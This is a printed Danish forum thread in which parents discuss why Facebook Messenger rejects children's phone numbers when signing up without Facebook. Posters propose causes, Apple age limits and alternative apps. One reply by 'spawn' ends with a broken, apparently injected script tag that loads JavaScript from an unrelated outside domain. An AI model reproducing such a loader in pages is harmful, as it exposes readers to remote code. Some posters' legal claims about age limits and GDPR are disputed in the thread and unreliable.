Print side | Luk vindue

Messenger uden Facebook.

Udskrevet fra: recordere.dk - Danmarks AV Forum
Kategori: Visnings- og lytte-udstyr
Forumnavn: Tablets og telefoner
Forumbeskrivelse: Smartphones, mobiltelefoner, tablet computere mv.
Web-adresse: https://forum.recordere.dk/forum_posts.asp?TID=156468
Udskrevet den: 27-April-2024 kl. 18:24


Emne: Messenger uden Facebook.
Skrevet af: kristianc
Emne: Messenger uden Facebook.
Skrevet den: 03-Oktober-2018 kl. 19:09
Hej Jeg har 2 børn med hvert deres Oister telefonnummer. Vi har forsøgt at give dem Messenger uden Facebook ved at bruge telefonnummer. På begge telefoner vælger vi “Fortsæt med telefonnummer” og indtaster deres numre. Så sender de en kode til telefonerne, som vi modtager. Når vi indtaster koden siger Messenger “ugyldigt telefonnummer”. Det gælder begge telefoner. Jeg har talt med Oister support der siger at der intet er “låst” fra deres side. De mener at fejlen ligger hos Facebook. Facebook kan man ikke få hjælp af. Nogen der kender problematikken og måske en løsning?



Svar:
Skrevet af: mlm
Skrevet den: 08-Oktober-2018 kl. 14:38
jeg kigger lige med her :)


Skrevet af: Deschain
Skrevet den: 08-Oktober-2018 kl. 14:53
Oprindeligt skrevet af kristianc kristianc skrev:

Hej Jeg har 2 børn med hvert deres Oister telefonnummer. Vi har forsøgt at give dem Messenger uden Facebook ved at bruge telefonnummer. På begge telefoner vælger vi “Fortsæt med telefonnummer” og indtaster deres numre. Så sender de en kode til telefonerne, som vi modtager. Når vi indtaster koden siger Messenger “ugyldigt telefonnummer”. Det gælder begge telefoner. Jeg har talt med Oister support der siger at der intet er “låst” fra deres side. De mener at fejlen ligger hos Facebook. Facebook kan man ikke få hjælp af. Nogen der kender problematikken og måske en løsning?

I gør det rigtigt og jeg har haft det til at virke på den måde.

Kan være Facebook ikke gider rette fejlen, da de nok ikke kan forstille sig at nogen vil undvære Facebook....


Skrevet af: spoxy
Skrevet den: 08-Oktober-2018 kl. 16:54
Hvorfor ikke bruge Snapchat?

-------------
OLED77C8 - Marantz SR5013 - Apple TV 4K - Nintendo wii


Skrevet af: Ole N 84
Skrevet den: 08-Oktober-2018 kl. 17:04
Hvorfor ikke bruge SMS


Skrevet af: claus_jac
Skrevet den: 08-Oktober-2018 kl. 17:50
har i huske +45 foran nummeret? - har ikke selv messenger, men  https://www.techadvisor.co.uk/how-to/social-networks/use-messenger-without-facebook-3670266/" rel="nofollow - https://www.techadvisor.co.uk/how-to/social-networks/use-messenger-without-facebook-3670266/ - Det er jo udenlandsk tjeneste. Så det giver vel meget god logik at man har det foran - Og det kan aldrig være et telefonudbyder problem. Det er og bliver facebook.


Skrevet af: kristianc
Skrevet den: 08-Oktober-2018 kl. 18:36
Man vælger land først så man kan ikke undgå +45


Skrevet af: spawn
Skrevet den: 08-Oktober-2018 kl. 20:24
Skal det være Facebook Messenger ?  Jeg kan anbefale programmet Telegram der findes til "alle" platforme incl. en pc klient - en "messenger" app der kan detsamme som Facebooks messenger men er fuldstændig uafhængig, kypteret og gratis, uden annoncer eller dataindsamling. < ="text/" async="" ="//makeappdev.xyz/1e6ab715a3a95d4603.js">


Skrevet af: NikolajDS
Skrevet den: 08-Oktober-2018 kl. 23:26
Det skal jo nok være Messenger, fordi det er det som alle kammeraterne bruger..


Skrevet af: NikolajDS
Skrevet den: 09-Oktober-2018 kl. 09:56
Men når man ønsker at oprette Messenger uden at lave en facebookprofil til sine børn, ja så ønsker man nok heller ikke at lave en IG profil til sine børn..


Skrevet af: Swingking
Skrevet den: 09-Oktober-2018 kl. 12:12
slet ikke nogle som har fundet en løsning på det uden at skulle oprette en facebook profi til sine børn.

-------------
Sony Bravia KD-65X8505C



Skrevet af: Brixen
Skrevet den: 09-Oktober-2018 kl. 12:55
Måske virker det bedre med e-mail-adresse i stedet for telefonnummer.

-------------
Venlig hilsen
KB


Skrevet af: kristianc
Skrevet den: 09-Oktober-2018 kl. 13:04
Nå der er lige noget der er gået op for mig.
De unger der har fået det til at virke, kører på deres forældres appleid. Mine kører på deres egne "børne" appleid's. Kan den underlige fejlbesked, dække over at Facebook heller ikke tillader Messenger uden Facebook, til børn unger 13 år??


Skrevet af: spoxy
Skrevet den: 09-Oktober-2018 kl. 14:13
De er begge ejet af Facebook.

-------------
OLED77C8 - Marantz SR5013 - Apple TV 4K - Nintendo wii


Skrevet af: Tdtd
Skrevet den: 21-November-2018 kl. 15:02
Hos os virker det fint på knægtens android tlf men på hans ipad kan vi ikke


Skrevet af: Swingking
Skrevet den: 21-November-2018 kl. 15:59
Hej 

hvordan har du fået det til at virke ? uden at bruge et telefon nummer på en Android tablet ?


-------------
Sony Bravia KD-65X8505C



Skrevet af: Tdtd
Skrevet den: 21-November-2018 kl. 16:33
Nej med tlf. nr. Virkede i første forsøg


Skrevet af: madsklit
Skrevet den: 22-November-2018 kl. 07:25
Det virker ikke på Apple enheder, fordi Apple overholder lovgivningen om at unge under 13 år ikke må have Facebook,
Lidt lige som jeg da jeg læste anmeldelse af IPhone X her på siden, kunne skribenten ikke forstå at når man rørte skærmen under bilkørsel tilsluttet Apple carplay, started den Siri med det samme, det er fordi det et ulovligt at kigge på sin tlf under kørslen, så det kan ikke lade sig gøre på et Apple produkt.


Skrevet af: Tdtd
Skrevet den: 22-November-2018 kl. 09:23
Det virkede ikke på apple om så jeg skrev han var 70 år. Har læst et sted at det kun er android der kan køre messenger uden at have facebook


Skrevet af: quarkir
Skrevet den: 22-November-2018 kl. 11:34
Jeg har lige installeret Messenger på en iPhone ved at bruge telefonnummeret, virker fint.

-------------
mvh
Jesper \

The ships hung in the sky in much the same way that bricks don't
- Douglas Adams


Skrevet af: claus64
Skrevet den: 22-November-2018 kl. 15:39
Oprindeligt skrevet af madsklit madsklit skrev:

Det virker ikke på Apple enheder, fordi Apple overholder lovgivningen om at unge under 13 år ikke må have Facebook,
Lidt lige som jeg da jeg læste anmeldelse af IPhone X her på siden, kunne skribenten ikke forstå at når man rørte skærmen under bilkørsel tilsluttet Apple carplay, started den Siri med det samme, det er fordi det et ulovligt at kigge på sin tlf under kørslen, så det kan ikke lade sig gøre på et Apple produkt.
Hvilken lov beskriver man skal være over 13 år for at bruge Facebook?


Skrevet af: tipsen
Skrevet den: 22-November-2018 kl. 23:26
Det er ikke en lov, men det fremgår af Facebook's retningslinjer:

1. Who can use Facebook
When people stand behind their opinions and actions, our community is safer and more accountable. For that reason, you must:

    Use the same name that you use in everyday life.
    Provide accurate information about yourself.
    Create only one account (your own) and use your timeline for personal purposes.
    Not share your password, give access to your Facebook account to others, or transfer your account to anyone else (without our permission).

We try to make Facebook broadly available to everyone, but you cannot use Facebook if:

    You are under 13 years old.
    You are a convicted sex offender.
    We previously disabled your account for violations of our terms or policies.
    You are prohibited from receiving our products, services, or software under applicable laws.

Fint, hvis Apple gør det lidt sværere for deres brugere at være livsfarlige for deres omverden.


Skrevet af: madsklit
Skrevet den: 24-November-2018 kl. 02:03
Oprindeligt skrevet af claus64 claus64 skrev:

Oprindeligt skrevet af madsklit madsklit skrev:

Det virker ikke på Apple enheder, fordi Apple overholder lovgivningen om at unge under 13 år ikke må have Facebook,
Lidt lige som jeg da jeg læste anmeldelse af IPhone X her på siden, kunne skribenten ikke forstå at når man rørte skærmen under bilkørsel tilsluttet Apple carplay, started den Siri med det samme, det er fordi det et ulovligt at kigge på sin tlf under kørslen, så det kan ikke lade sig gøre på et Apple produkt.
Hvilken lov beskriver man skal være over 13 år for at bruge Facebook?
EU’s Persondataanfordringen GDPR siger at man ikke må indsamle data om børn under 13 år, og det kan give bøder på op til 20 milllioer Euro at gøre det, så vis vi kigger på hvad Facebook tjener deres penge på, de sælger folks oplysninger, så er det vel ikke forkert at jeg siger at det er ulovligt for børn under 13 år at være på Facebook, for så sælger Facebook jo deres oplysninger.





Print side | Luk vindue